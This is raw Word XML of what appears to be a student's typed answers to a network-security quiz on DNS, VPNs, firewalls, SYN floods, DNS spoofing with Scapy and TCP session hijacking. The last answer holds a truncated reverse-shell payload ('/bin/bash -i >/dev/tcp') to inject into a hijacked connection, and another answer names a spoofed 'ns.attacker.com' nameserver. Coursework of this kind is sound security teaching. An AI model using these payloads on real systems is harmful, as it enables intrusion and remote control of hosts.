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8281" w14:textId="6DF184CC" w:rsidR="00DC7DF3" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9538C7" wp14:editId="1C8A63E3">
            <wp:extent cx="4240033" cy="5653377"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
            <wp:docPr id="1" name="Picture 1" descr="A paper with text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per with text on i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546" cy="56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8290" w14:textId="0F6243A3" w:rsidR="00DC7DF3" w:rsidRDefault="006B0C1D" w:rsidP="00DC7DF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="0035164B">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0035164B" w:rsidRPr="0035164B">
        <w:t>dig -x &lt;IP address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBEA19" w14:textId="46CC2597" w:rsidR="006B0C1D" w:rsidRDefault="006B0C1D" w:rsidP="00DC7DF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0035164B">
        <w:t xml:space="preserve"> - NS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D689040" w14:textId="27669AC4" w:rsidR="006B0C1D" w:rsidRDefault="006B0C1D" w:rsidP="00DC7DF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0035164B">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00B67B2D" w:rsidRPr="00B67B2D">
        <w:t>ucmo.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E1BA44" w14:textId="0B5E0ECB" w:rsidR="006B0C1D" w:rsidRDefault="006B0C1D" w:rsidP="00DC7DF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00B67B2D">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00B67B2D" w:rsidRPr="00B67B2D">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B67B2D" w:rsidRPr="00B67B2D">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B67B2D" w:rsidRPr="00B67B2D">
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A44B0" w14:textId="32C1D32B" w:rsidR="006B0C1D" w:rsidRDefault="006B0C1D" w:rsidP="00DC7DF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00B67B2D">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00BB4603" w:rsidRPr="00BB4603">
        <w:t>1.2.3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7768326E" w14:textId="77777777" w:rsidR="006B0C1D" w:rsidRDefault="006B0C1D" w:rsidP="006B0C1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4019EA93" w14:textId="3D48E018" w:rsidR="006B0C1D" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AE0866F" wp14:editId="1A49BECC">
            <wp:extent cx="4502426" cy="6003235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="A paper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per on a tabl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453" cy="60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D8A1" w14:textId="4A305656" w:rsidR="006B0C1D" w:rsidRDefault="006B0C1D" w:rsidP="006B0C1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="005A6F0C">
        <w:t xml:space="preserve"> - 3 Days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC34B08" w14:textId="2F7A3C1E" w:rsidR="00925897" w:rsidRPr="006929A0" w:rsidRDefault="00925897" w:rsidP="006B0C1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006929A0">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="005A6F0C" w:rsidRPr="006929A0">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B73E6" w14:textId="4EDEEE8A" w:rsidR="00925897" w:rsidRPr="006929A0" w:rsidRDefault="00925897" w:rsidP="006B0C1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006929A0">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00CD7555" w:rsidRPr="006929A0">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F0786" w14:textId="77777777" w:rsidR="00925897" w:rsidRDefault="00925897" w:rsidP="00925897">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2D7C49" w14:textId="4F05C19A" w:rsidR="00925897" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="167D8316" wp14:editId="74CC9958">
            <wp:extent cx="4454718" cy="5939624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164" cy="59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1CEB" w14:textId="4BFE7C57" w:rsidR="00925897" w:rsidRDefault="00C61C8B" w:rsidP="00925897">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0010254C">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0010254C" w:rsidRPr="0010254C">
        <w:t>3.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0010254C" w:rsidRPr="0010254C">
        <w:t>91.153.in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0010254C" w:rsidRPr="0010254C">
        <w:t>-addr.arpa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104485AD" w14:textId="7768492F" w:rsidR="00C61C8B" w:rsidRDefault="00C61C8B" w:rsidP="00925897">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00F95502">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00F95502" w:rsidRPr="00F95502">
        <w:t>SOP is not enforced by the browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27788960" w14:textId="4B0B90ED" w:rsidR="00C61C8B" w:rsidRDefault="00C61C8B" w:rsidP="00925897">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="003608C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003608C7" w:rsidRPr="003608C7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003608C7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003608C7" w:rsidRPr="003608C7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>IPSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003608C7" w:rsidRPr="003608C7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> tunneling is the preferred VPN technology nowadays due to its flexibility by adopting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003608C7" w:rsidRPr="003608C7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>IPSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003608C7" w:rsidRPr="003608C7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B90B13" w14:textId="3B4CBFE1" w:rsidR="00951F20" w:rsidRDefault="00951F20" w:rsidP="00925897">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="003608C7">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="006F7243" w:rsidRPr="006F7243">
        <w:t>the TUN interface works at the transport layer as it is mainly used for the TLS/SSL tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F62363" w14:textId="3AB8847A" w:rsidR="00620AD2" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="627DC390" wp14:editId="4F346167">
            <wp:extent cx="4610100" cy="6146800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="4" name="Picture 4" descr="A paper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aper on a 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23" cy="614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FABA" w14:textId="5C2A05FB" w:rsidR="00997033" w:rsidRPr="009F165D" w:rsidRDefault="00620AD2" w:rsidP="00997033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F165D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="003E1EC8" w:rsidRPr="009F165D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E7447" w:rsidRPr="009F165D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F980E" w14:textId="1EFC0F2A" w:rsidR="00997033" w:rsidRDefault="009578C1" w:rsidP="00997033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00BF2FE5">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00BF2FE5" w:rsidRPr="00BF2FE5">
        <w:t>input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755C5135" w14:textId="64D9831A" w:rsidR="00997033" w:rsidRDefault="00997033" w:rsidP="00997033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00B37F27">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00B37F27" w:rsidRPr="00B37F27">
        <w:t>multiport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879A702" w14:textId="2E90DD36" w:rsidR="00997033" w:rsidRDefault="001E29FA" w:rsidP="00997033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00175EE8">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00CC5CB7" w:rsidRPr="00CC5CB7">
        <w:t>SYN, SYNACK, ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D771606" w14:textId="009D87C3" w:rsidR="001E29FA" w:rsidRDefault="001E29FA" w:rsidP="00997033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="002B55FA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="002B55FA" w:rsidRPr="002B55FA">
        <w:t>The server is under TCP SYN flood attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC2C89F" w14:textId="77777777" w:rsidR="001E29FA" w:rsidRDefault="001E29FA" w:rsidP="001E29FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697EFC36" w14:textId="71A54165" w:rsidR="001448C1" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DAC1A32" wp14:editId="16A5CC8F">
            <wp:extent cx="4629150" cy="6172200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="A paper on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aper on a tabl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389" cy="61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A96A" w14:textId="13CAD91F" w:rsidR="001448C1" w:rsidRDefault="009D52A6" w:rsidP="001448C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00640B7B">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00640B7B" w:rsidRPr="00640B7B">
        <w:t>TCP SYN flood attacked is a DOS attack which will cause the entire server to crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680DEC04" w14:textId="752EAF1D" w:rsidR="009D52A6" w:rsidRDefault="009D52A6" w:rsidP="001448C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002D407F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D51A13">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="002D407F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D51A13">
        <w:t>128.230.153.80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D0C8E" w14:textId="728A94C5" w:rsidR="009D52A6" w:rsidRDefault="0078043F" w:rsidP="001448C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00D51A13">
        <w:t xml:space="preserve"> - 128.230.153.48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240D2E6" w14:textId="214C8B06" w:rsidR="0078043F" w:rsidRDefault="002550D7" w:rsidP="001448C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657794AD" w14:textId="030F8FAB" w:rsidR="00F17C81" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54AB9E60" wp14:editId="637E65AD">
            <wp:extent cx="4785931" cy="638124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719" cy="63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433B" w14:textId="7CA99E32" w:rsidR="00F17C81" w:rsidRDefault="00F17C81" w:rsidP="00F17C81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00652D14">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00652D14" w:rsidRPr="00652D14">
        <w:t>pkt[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00652D14" w:rsidRPr="00652D14">
        <w:t>IP]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00652D14" w:rsidRPr="00652D14">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00652D14" w:rsidRPr="00652D14">
        <w:t>, pkt[IP]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00652D14" w:rsidRPr="00652D14">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04BA14C0" w14:textId="3C8C3D57" w:rsidR="009E7DE4" w:rsidRDefault="009E7DE4" w:rsidP="00F17C81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00CA284D">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CA284D" w:rsidRPr="00CA284D">
        <w:t>pkt[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CA284D" w:rsidRPr="00CA284D">
        <w:t>UDP].sport, pkt.[UDP].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA284D" w:rsidRPr="00CA284D">
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AD90548" w14:textId="77E60692" w:rsidR="009E7DE4" w:rsidRDefault="009E7DE4" w:rsidP="00F17C81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00CA284D">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00CA284D" w:rsidRPr="00CA284D">
        <w:t>'A','NS','ns.attacker.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467432F9" w14:textId="6E6CBD8A" w:rsidR="009E7DE4" w:rsidRDefault="009E7DE4" w:rsidP="009E7DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00791826">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00791826" w:rsidRPr="00791826">
        <w:t>pkt[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00791826" w:rsidRPr="00791826">
        <w:t>DNS].id, pkt[DNS].qd,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71447895" w14:textId="6AD2ED9A" w:rsidR="009E7DE4" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1059ECA5" wp14:editId="10B97E71">
            <wp:extent cx="4903287" cy="6537716"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="A hand holding a pen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hand holding a pen on a piece of pap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640" cy="654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285A" w14:textId="367412DD" w:rsidR="009E7DE4" w:rsidRDefault="009B401C" w:rsidP="009B401C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="005A782A">
        <w:t xml:space="preserve"> – PRE_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A782A">
        <w:t>IPDST,PRE_IP</w:t>
      </w:r>
      <w:r w:rsidR="007B509C">
        <w:t>.SRC</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52CB28C5" w14:textId="0B474E56" w:rsidR="009B401C" w:rsidRDefault="009B401C" w:rsidP="009B401C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007B509C">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B509C" w:rsidRPr="007B509C">
        <w:t>pre_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007B509C" w:rsidRPr="007B509C">
        <w:t>tcp.dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007B509C" w:rsidRPr="007B509C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B509C" w:rsidRPr="007B509C">
        <w:t>pre_tcp.sport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77C289E3" w14:textId="487EF9B4" w:rsidR="009B401C" w:rsidRDefault="009B401C" w:rsidP="009B401C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="007B509C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7E7BF6" w14:textId="77777777" w:rsidR="009B401C" w:rsidRDefault="009B401C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260AAE14" w14:textId="4166724F" w:rsidR="009B401C" w:rsidRDefault="0026224D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="562F4338" wp14:editId="383F6904">
            <wp:extent cx="4576891" cy="6102520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="A hand holding a pen over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hand holding a pen over a piece of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193" cy="61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2302" w14:textId="45ABD821" w:rsidR="009B401C" w:rsidRDefault="00801F76" w:rsidP="009B401C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="005839E6">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005839E6" w:rsidRPr="005839E6">
        <w:t>old_ip.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005839E6" w:rsidRPr="005839E6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005839E6" w:rsidRPr="005839E6">
        <w:t>old_ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49ABDF08" w14:textId="74940447" w:rsidR="00801F76" w:rsidRDefault="00801F76" w:rsidP="009B401C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="007C13A2">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C13A2" w:rsidRPr="007C13A2">
        <w:t>old_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007C13A2" w:rsidRPr="007C13A2">
        <w:t>tcp.dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007C13A2" w:rsidRPr="007C13A2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C13A2" w:rsidRPr="007C13A2">
        <w:t>old_tcp.sport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E77F2B1" w14:textId="7A150620" w:rsidR="00801F76" w:rsidRDefault="00801F76" w:rsidP="009B401C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1398E766" w14:textId="697135E0" w:rsidR="00801F76" w:rsidRDefault="00801F76" w:rsidP="009B401C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00DE322C">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B1724" w:rsidRPr="002B1724">
        <w:t>old_tcp.ack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B1724" w:rsidRPr="002B1724">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B1724" w:rsidRPr="002B1724">
        <w:t>tcp_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B1724" w:rsidRPr="002B1724">
        <w:t>, "\n/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B1724" w:rsidRPr="002B1724">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B1724" w:rsidRPr="002B1724">
        <w:t xml:space="preserve"> &gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B1724" w:rsidRPr="002B1724">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
